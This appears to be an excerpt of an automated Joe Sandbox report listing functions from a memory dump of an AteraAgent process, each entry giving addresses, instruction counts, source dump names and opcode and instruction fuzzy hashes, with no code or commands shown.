                                                                                                                                                                                                                                          • Opcode ID: 759fd548cecd004f34199e90b656dd2c367a5ec01d0a5785742ef0bf8637ec5e
                                                                                                                                                                                                                                          • Instruction ID: c044fd368b09a622bdb44d4f4d765d61e2b350c5482a436a151d9d4206732c9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 759fd548cecd004f34199e90b656dd2c367a5ec01d0a5785742ef0bf8637ec5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051086260E6868FE796D77888557A53BE1EF47350F4942FBC04ECB1E3D918680A8391
                                                                                                                                                                                                                                          Function 00007FFAAB58BF69 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6788357f921fdbf91a72e840bfcb617d543d8870eba48806d8c9c93312472934
                                                                                                                                                                                                                                          • Instruction ID: f19808ffb8fbbd95fe905d586e339a8c86b9956a7059b8cfc723987784e16470
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6788357f921fdbf91a72e840bfcb617d543d8870eba48806d8c9c93312472934
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42415A6290F7C68FD757877448255743FB5AE5328070E81EBC089CB1E3DA1D980E9362
                                                                                                                                                                                                                                          Function 00007FFAAB58ADFA Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f48b87f1d9e8c0b1d3a263f9e1cc0de1f8d3e632303ef583970971b471c89a31
                                                                                                                                                                                                                                          • Instruction ID: 26c3d398bfdbeb744bc7b067b72063af3db91ebfb98504833436e9e204ceac87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f48b87f1d9e8c0b1d3a263f9e1cc0de1f8d3e632303ef583970971b471c89a31
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28413862B1CE8B8FE798D76CD4502B537D5FFD9290B0445BAD04EC7297ED18D8068381
                                                                                                                                                                                                                                          Function 00007FFAAB58FD1B Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0af59b0ef7148924d6a139f6a490bbc19cd94c0b07c38fa20afdc0af466575ed
                                                                                                                                                                                                                                          • Instruction ID: 763179641896df45797858178ce9a75584980b22ab0cb15206b3100fb6ac3aa1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af59b0ef7148924d6a139f6a490bbc19cd94c0b07c38fa20afdc0af466575ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C514071E14A5E8FE7A9EB68C8997E8B3E5EF59340F0045FAD04DD3192CE3459858B80
                                                                                                                                                                                                                                          Function 00007FFAAB59ABC9 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8821b449fc030221a4a66a472d940d05952b8bdd2d531b917d18f6d11dd03327
                                                                                                                                                                                                                                          • Instruction ID: d65f78b6a185110ead56aaaee0b978dce90027fd22d626b63cf39c1d9a9d3922
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8821b449fc030221a4a66a472d940d05952b8bdd2d531b917d18f6d11dd03327
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B512970D0965E8FDB58DFA8C4946ECBBB1FF59300F10406AD00EE72A2DB39A985CB50
                                                                                                                                                                                                                                          Function 00007FFAAB59A1E5 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 15ba4963e75f15d88e2e60eeeba2dd36c824eb22cf08181bc7458d9dac0d690c
                                                                                                                                                                                                                                          • Instruction ID: f7c31e70e1e3a9b2b1c4a67122879f6d03df1d13d5d12c9939910584f4a85163
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ba4963e75f15d88e2e60eeeba2dd36c824eb22cf08181bc7458d9dac0d690c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B513A72A0E7CA8FE755975C9C515B03BE4EF53260F0941BAD08EC71E3ED19E80A8791
                                                                                                                                                                                                                                          Function 00007FFAAB594C00 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6e792dce571208c0781ed055de58c55b71b3a9fa5a9f2b1feaf611cf126a747e
                                                                                                                                                                                                                                          • Instruction ID: b6a7f974ca2856c018f2fde0bd114563fc3c270dbff58be9cac8b18164ccf90c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e792dce571208c0781ed055de58c55b71b3a9fa5a9f2b1feaf611cf126a747e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41C861A1DD4B8FF6B9D76C945467926D5EF99380F0881BAD04FC72E3CD19AC0A83C1
                                                                                                                                                                                                                                          Function 00007FFAAB59F021 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e01b0867ac5829992699e2e78954ccefaa88c3b9085d9c66fa99ec758d194b96
                                                                                                                                                                                                                                          • Instruction ID: 7df076b9eb4709749c86119cd755ea05caa01055d371edf2034c827629ffa753
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e01b0867ac5829992699e2e78954ccefaa88c3b9085d9c66fa99ec758d194b96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9741392070DA4A4FE799DB2CD819BB677D5EF9A350B4441FEE04EC32A3DD19AC458380
                                                                                                                                                                                                                                          Function 00007FFAAB582F45 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23c2845ac16ff1f1763241354049935924c46103c7260d0ee3ee6932236a99b6
                                                                                                                                                                                                                                          • Instruction ID: fe47a968530aae4919411d7e2eaf55a226a07da7f09b358fa92ee1aec65ab5a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23c2845ac16ff1f1763241354049935924c46103c7260d0ee3ee6932236a99b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D51F570A09A1DCFDF98EF68D455AEDBBB1EF59341F10016AD40DE3292DA34A845CB80
                                                                                                                                                                                                                                          Function 00007FFAAB5995CC Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d2988ee202a1c9c40013f6e765572571b697dc7394d3c699f80dfa21559d3a8d
                                                                                                                                                                                                                                          • Instruction ID: 997c56b1e3b3a28c70454d3cc267a94a18a524e22b8b5d970945cc6d49ed039b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2988ee202a1c9c40013f6e765572571b697dc7394d3c699f80dfa21559d3a8d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51C7A260E6C68FE392D72C889D6A57BD5DF57250F0845FED08ECB1B3D925680AC381
                                                                                                                                                                                                                                          Function 00007FFAAB582F38 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3876d2f8b5064d714477135a88b79f8b2a2eef605bf79ac26a3fc8129c85467a
                                                                                                                                                                                                                                          • Instruction ID: f013958f9d149e326d872f6c55250eff77d3075b88809ebe5bbe0c7e6dc166cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3876d2f8b5064d714477135a88b79f8b2a2eef605bf79ac26a3fc8129c85467a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD412770A09A1DCFDF94EF68D855AEDBBB1EF59341F10417AD00DE32A2DA35A845CB80
                                                                                                                                                                                                                                          Function 00007FFAAB5838E1 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0f41cb01faabfad56b9817a6c7fbb74c6e89887a3f0ec2390f53a88dcb87bf93
                                                                                                                                                                                                                                          • Instruction ID: 358c309bc4a6da94957cfc44a5108ea6b95833966d28d908c34dcff6cd73fdb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f41cb01faabfad56b9817a6c7fbb74c6e89887a3f0ec2390f53a88dcb87bf93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141A471D09A4D9FDB81DF68C441AFEBBF1FF5A340F4441A6E00CD7292DA3899458B90
                                                                                                                                                                                                                                          Function 00007FFAAB595150 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 69b8c8e51eb97a421608e7f45ac9f6c878b0ae30843cefd953a2c4fb31b3cd6a
                                                                                                                                                                                                                                          • Instruction ID: 33f87b6090d7d8cc64c0a797389906a8251fd841612eec5bcf793f178bd9c40f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69b8c8e51eb97a421608e7f45ac9f6c878b0ae30843cefd953a2c4fb31b3cd6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417030619B468FDFA5EB3CC050E6277D5EF96340B5485A9D04FC76A3C925F849CB90
                                                                                                                                                                                                                                          Function 00007FFAAB58A01D Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3fd1c4dfeb408111d20fd33c116d2b6fdbb5d7646866603ee18a29185dfe00a4
                                                                                                                                                                                                                                          • Instruction ID: fde02ac30c4a879244a2adb576fa35179ca24935cbccb65fb624edddd86bd1fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd1c4dfeb408111d20fd33c116d2b6fdbb5d7646866603ee18a29185dfe00a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF41777250CB858FD740F768EC62AAAB7D4FFA6350F04457BD04AC3192EA15A84D87C2
                                                                                                                                                                                                                                          Function 00007FFAAB58F198 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f962ef2639d118c510a42b3c54b636c135bcfbaa610d862352ee8f871e7ebc9b
                                                                                                                                                                                                                                          • Instruction ID: 4cfa051ba3d560388581a9a13b25a2dd183b0a7c24bfdd6a0eb712aa80084868
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f962ef2639d118c510a42b3c54b636c135bcfbaa610d862352ee8f871e7ebc9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3417F31A08A0A8FDB98DF58D4556BA37D1FFA9350F10457EE40ED32A6CE26A84687C1
                                                                                                                                                                                                                                          Function 00007FFAAB585768 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8487b8adfa7bfc8c14dc552ffcf6e6dc162b1592a1c1e1dc410b7b5d9d55a1a9
                                                                                                                                                                                                                                          • Instruction ID: 1eac8d4596d95f1e26099297b2f7156fca8870552024cf71c1e54fe861fc05d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8487b8adfa7bfc8c14dc552ffcf6e6dc162b1592a1c1e1dc410b7b5d9d55a1a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09417F7190A60ACFDB94DFA8E4516FDB7B5FF4A350F50447AD00ED32A2CE7998458B80
                                                                                                                                                                                                                                          Function 00007FFAAB58A0F3 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b857642c789ee0b35a58cb3e6bc56d9045dd992954ff20215a6addfd48f9c487
                                                                                                                                                                                                                                          • Instruction ID: 9ef235ab3b16f54622058ab127cfd840e06a6256e527b7f2aad970b333ddc64a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b857642c789ee0b35a58cb3e6bc56d9045dd992954ff20215a6addfd48f9c487
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00410871B05A4E8FEB94EB2C84596B53BD1FF5A341F4040BAD44EC72A3ED259C458780
                                                                                                                                                                                                                                          Function 00007FFAAB5938CC Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4ef40a3e469c0bebc56182da64553dc3775d2f3576286383644aacbdb8a9267e
                                                                                                                                                                                                                                          • Instruction ID: 3e93a86f5eb670c1c70856795d3e1492416b57d9e8666cce31e6be72dc69152f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef40a3e469c0bebc56182da64553dc3775d2f3576286383644aacbdb8a9267e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2313E21749C1A8FEAA4EF4CE094BA473D1FB9D3A0B1445B6D14EC73A6D929EC458B80
                                                                                                                                                                                                                                          Function 00007FFAAB587180 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4d1fb3ff886e168e76a94056232b852d856dcdc453940eee6f2f04a120b9f8e1
                                                                                                                                                                                                                                          • Instruction ID: a447eb0e0f86dfa61152cf368846c7dadb2d4c757f2d73f196cb7f60ce575346
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d1fb3ff886e168e76a94056232b852d856dcdc453940eee6f2f04a120b9f8e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31E532B19D1D8FEBA4EB1C94997B93BE5FB99390F04417AE40EC3296DE14AC0647C1
                                                                                                                                                                                                                                          Function 00007FFAAB58BDE7 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 08fe730844cdc48c1ebe388a05abc1450fa1b40fea8fa03be691e38ca39eaec9
                                                                                                                                                                                                                                          • Instruction ID: 7e8685f5c08d1d26132d7719e8f8d9da925e22e48ba660947fe32474a25a76a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08fe730844cdc48c1ebe388a05abc1450fa1b40fea8fa03be691e38ca39eaec9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20318C52A0DF8A8FEBA4E7A894956B877E5DB99380F0445BAC00EC7193DC2A5C4B47C1
                                                                                                                                                                                                                                          Function 00007FFAAB59CF2D Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 02ea72496064855d331bb2b721494c827303d99dd463865781c4b307c47c0b1f
                                                                                                                                                                                                                                          • Instruction ID: 76cc695b96905e56def9d4632dd022a02ca64c04a608d937ab35dda32e7084f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ea72496064855d331bb2b721494c827303d99dd463865781c4b307c47c0b1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB31B370619A0ACBD729EB18D088A7573D5FF5A344F50817DD05FC72A2DE35B84A87C0
                                                                                                                                                                                                                                          Function 00007FFAAB58B94D Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c40071860a1eec76f0f9605d474289222064d13b9f392981adb4f423ff140939
                                                                                                                                                                                                                                          • Instruction ID: ac353bc5a81432cc3e63c7741935cbec52e40228f30867b45db8f99b7aa92c85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40071860a1eec76f0f9605d474289222064d13b9f392981adb4f423ff140939
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D62160C9464FD656F77CD0919FA3BE59F85354B1844B9D08FCB2A3CE14688ACBC4
                                                                                                                                                                                                                                          Function 00007FFAAB58BB15 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc1d6599074f02b2948d17fe597e58f505c8e40f5c0c64e7d63f58a605569649
                                                                                                                                                                                                                                          • Instruction ID: e1e2e5d532bf9b4371c2950c46f95b0c89f6f2d24f69eeb0e89b7249d2d68445
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc1d6599074f02b2948d17fe597e58f505c8e40f5c0c64e7d63f58a605569649
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B43138A2E08B8A8FE744DBB8C4126F9BBE4FF56380F4405B5D10DC71E3DD2958468B91
                                                                                                                                                                                                                                          Function 00007FFAAB59D005 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 20cc356f96c83ef4c1e6114d14c500a0d97cad66fc889fd6455921552a64c99f
                                                                                                                                                                                                                                          • Instruction ID: d196692f7ada73752d47a77c9c3b4d991cc38a8f93b57b8f0e643f3bf6a06d93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20cc356f96c83ef4c1e6114d14c500a0d97cad66fc889fd6455921552a64c99f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8319022B1A81A8FEB54A75CE455BF837E5EB9A360F0841B6D00EC7297DD19684687C0
